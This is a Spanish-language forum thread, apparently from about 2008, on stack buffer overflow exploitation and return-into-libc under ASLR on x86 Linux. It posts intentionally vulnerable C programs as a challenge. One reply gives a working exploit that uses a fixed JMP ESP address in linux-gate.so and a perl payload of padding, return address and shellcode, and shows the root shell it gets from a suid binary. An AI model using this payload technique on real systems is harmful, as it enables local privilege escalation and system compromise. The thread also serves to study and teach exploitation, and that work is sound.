Buenas  a todos,
Este es mi primer post, y me ha costado mucho encontrar un foro de "hacking" donde haya un poco de calidad, al fin lo conseguí, parece ser que aki hay gente con nivel...

En muchos foros de juankers, en el hilo de exploits, veo que los posts que mas abundan són, como compilo un exploit, que es un exploit y me muero por ser hacker...

No es por nada  pero mis inquietudes van mas allá, se acabó la presentación.

Tras estar 5 días en calma y trankilidad en mi casa de campo, solo yo, mi computer y mi piano, empiezo la semana con una inquietud tremenda....

Llevo 4 dias dale que te pego con el metodo de explotación de buffer overflow, "Return into libc".

En teoría no tiene muxa complicación, segun los papers de internet, el que mas me ayudó fue el de phrak y enyesecurity, este último para 64Bits.

Que pasa entonces, cual es el problema..?

Pues que las cosas cambiaron muxo desde entonces, y "ninguno" de los que encontré está actualizado, no chutan.

Eso si me ayudaron a entender la tecnica y a "medio" implementarla en un Poc.

Por si alguien se vuelve medio loco provando técnicas y tal y tal, enumeraré los cambios que hacen que este método actuálmente sea muy dificil de ejecutar.

1-Para sacar los offsets de por ejemplo system, antes con "gdb p system" ya la teníamos, con PLT (dynamic addr) se acabó lo que se daba, a partir de ahora solo podremos saltar a las funciones que importa el binario en cuestión.

2-Mas de lo mismo, si antes se podian encontrar las direcciones de memoria de las variables de entorno vease SHELL=/bin/sh, pues ahora tambien pero con la dirección aleatoria.....getenv("SHELL") ya no chuta.

3-Para qué system("/bin/sh")? si podemos copiar nuestra shellcode con mmap y luego retornar a ella, pues aki el problema se plantea cuando vemos que con los linux de ahora.....el ESP es dinámico tambien, o sea que no hay manera de determinar el FRAME(segun PHRAK) y no podemos saber el offset de nuesto shellcode para copiarlo con mmap.

4-Pues calculemos el offset de ESP------SHELLCODE, tampoco siempre es aleatorio, y por fuerza bruta lo veo inviable.


Mmmm la cosa esta dificil y solo queda recurrir a un CALL ESP o JMP ESP cosa que implica el estudio del binario en cuestion y no deja de ser un stack overflow.

Por lo tanto replanteo mis dudas:

1-Es possible hacer un "return into libc" actualmente y con exito en x86, o hay que ir saltando por el binario hasta conseguir retornar al stack?

2-De que manera se puede localizar el offset de la shellcode una vez en ejecuión?

Estas preguntas son muy genéricas, y que mejor para responderlas...que un ejemplo de  codigo vulnerable, para que a la vez sirvan de reto para los mas inquietos..

-----code bof1.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void basura(void) {
        system(NULL);
        }

void f1(char *argv[])
  {
  char buf[1024];

  strcpy(buf, argv[1]);  /* OVERFLOW */
  }


int main(int argc, char *argv[])
  {
  char *p;//="/bin/sh;#";
  p=malloc(1024);

  f1(argv);
  return(0);
  }
-----fin_code

gcc -ggdb bof1.c -o bof1

Por supuesto decir que NO vale un retorno al stack, a no ser que se utilicen saltos del propio binario, o saltos de alguna funcion de libc.

Y para los que esten comenzando, el mismo codigo pero con una ayudita para que sea mas facil....

----code bof2.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

void basura(void) {
        system(NULL);
        }

void f1(char *argv[])
  {
  char buf[1024];

  strcpy(buf, argv[1]);  /* OVERFLOW */
  }


int main(int argc, char *argv[])
  {
  char *p;//="/bin/sh;#";
  p=malloc(1024);
  f1(argv);

__asm__ (  "mov %esp, %eax\n\t"
            "call   *%eax\n\t");

  __asm__("mov (%esp), %ebp\n\t"
          " call *%ebp\n\t");
  exit(0);
  return(0);
  }

---fin code

)
Espero vuestra colaboración, y al final del reto presentar las técnicas aplicadas.

Yo por mi parte tengo un tutorial de como explotarlo con ayudas varias y uso de gdb, aunque tengo que decir, que debo completarlo con el que resuelva el reto, o sea que el reto tambien es mio.

Gracias a totus por la colaboración.

Buenas.

Mm, de que me suenan parte de esos ejemplos?..  . A ver, el reto es explotar esos codigos en linux, pero en que linux?; x86 con randomize (ASLR) activado?, x86 sin randomize?, x86 con PaX (stack no ejecutable para que nos entendamos)?, x86_64?...

Lo de con el señor & no lo he pillado... 

Un saludo!.

Wenash,

Bueno pues voy a poner un posible exploit para el primer reto, NO pasa NO-EXEC-STACK.

Pero a modo didactico creo que ya esta bien.

Es un metodo para saltarse el random stack y se utiliza una vulnerabilidad por asi decirlo del kernel, en teoria solventado a partir de la version 2.6.14.

Yo lo he probado con una debian estable totalmente actualizada y con un kernel 2.6.18-6-k7 y funciona.

--linux-gate.so ret atack--

Creo que esto ya lleva un par de anyitos rulando por ahi y se aprovecha de un dynamic shared object DSO creado por el kernel del sistema, y que es imprescindible cuando hay una  system call con 6 argumentos y el registro ebp debe ser sobreescrito por el sexto argumento.

Que peculiaridad tiene esto...pues que  tiene un offset fijo propio al que podremos saltar, y que nos ofrecera este bonito metodo.....pues un maravilloso.

JMP %ESP

Con esto  lo tenemos muy facil y podemos saltar hacia nuestro shellocode colocado en el stack y asi saltandonos el random stack ya que este objeto siempre tiene el mismo offset.

Vamos a comprovar todo esto.

# gcc -ggdb -o bof1 bof1.c
# ldd bof1
        linux-gate.so.1 =>  (0xffffe000)  <------------------offset
        libc.so.6 => /lib/tls/libc.so.6 (0xb7db2000)
        /lib/ld-linux.so.2 (0xb7eee000)

# ldd bof1
        linux-gate.so.1 =>  (0xffffe000)  <------------------offset
        libc.so.6 => /lib/tls/libc.so.6 (0xb7e09000)
        /lib/ld-linux.so.2 (0xb7f45000)

Asi vemos que todas las demas direcciones son dinamicas pero la que nos interesa no varia...

Ahora sacaremos el salto que nos interesa buscando en la  memoria a partir de la direccion obtenida.



# gcc got_jmpesp.c -o got_jmpesp
# # ./got_jmpesp
* 0xffffe777 : jmp *%esp

Bien, vemos que hay un bonito salto hacia esp con lo cual el buffer a explotar quedaria asi:

             1028 bytes                   4 bytes                                 30 bytes
       AAAAAAAAAAAAAA            JMP %ESP                             SHELLCODE
|------------------------------||---------------------||--------------------------------------------|
   `perl -e 'print "A" x 1028     "\x77\xe7\xff\xff"   "\x6a\x17\x58\x?x?x?x?x\xe1\xcd\x80"

Vamos a probar desde la shell.

# id

uid=0(root) gid=0(root) grups=0(root)

# chmod +s bof1

# su sylkat

# uname -a

2.6.18-6-k7 #1 SMP Sun Feb 10 22:16:15 UTC 2008 i686 GNU/Linux


sh-3.1# id

uid=0(root) gid=1041(sylkat) egid=0(root) groups=1041(sylkat)

sh-3.1# exit

Hemos obtenido un suid de root XD, saltandonos asi el maldito random stack... aunque este random stack no es tan aleatorio como ya veremos en el proximo capitulo   

PD:US teclado, no acentos no enyes....... 


Referencia:

http://milw0rm.com/papers/55

Hola, mola el exploit  .

Quería comentar un par de cosillas. El:

memset(evilbuf, 0x68 , sizeof(evilbuf));

No entiendo para que esta?..  . Lo del uid 0, que lo estas probando en debian?. Lo normal es que la bash te quite el euid 0, creo que hace algo como seteuid(getuid()), y si le das suid root al programa vulnerable lo pierdes en el system(), con lo que el sh.c no funcionaría. La bash de debian tengo entendido que está modificada y no hace eso. Puedes probarlo copiando /bin/sh a /tmp/sh y darle suid root, y probar a ejecutarla con usuario != uid0 y mirar si mantiene el euid=0.

Lo de que falle a veces, supongo que es porque no coincide %esp apuntando a './bin/sh;#', supongo que antes de saltar a la PLT se podria saltar al propio binario y hacer algun arreglillo, no? (igual no).

Un saludo  .

Buenas.

Yo lo de la bash de debian lo sabía, pero no tengo ni idea de porque está asi. Igual algun programa de debian hace system() y necesita privilegios de root, pero es un poco cutrilla la explicación. La verdad es que ni idea...

Lo del exploit, no puedes publicar el binario del vuln?, para poder hacer un exploit y que lo testeemos. Es que si no hay binario, hacer un exploit funcional basandonos en el código ya sería demasiado trabajo jeje. Pon el binario en alguna parte y lo miramos a ver, o enviamelo al email si lo prefieres.

Un saludo!  .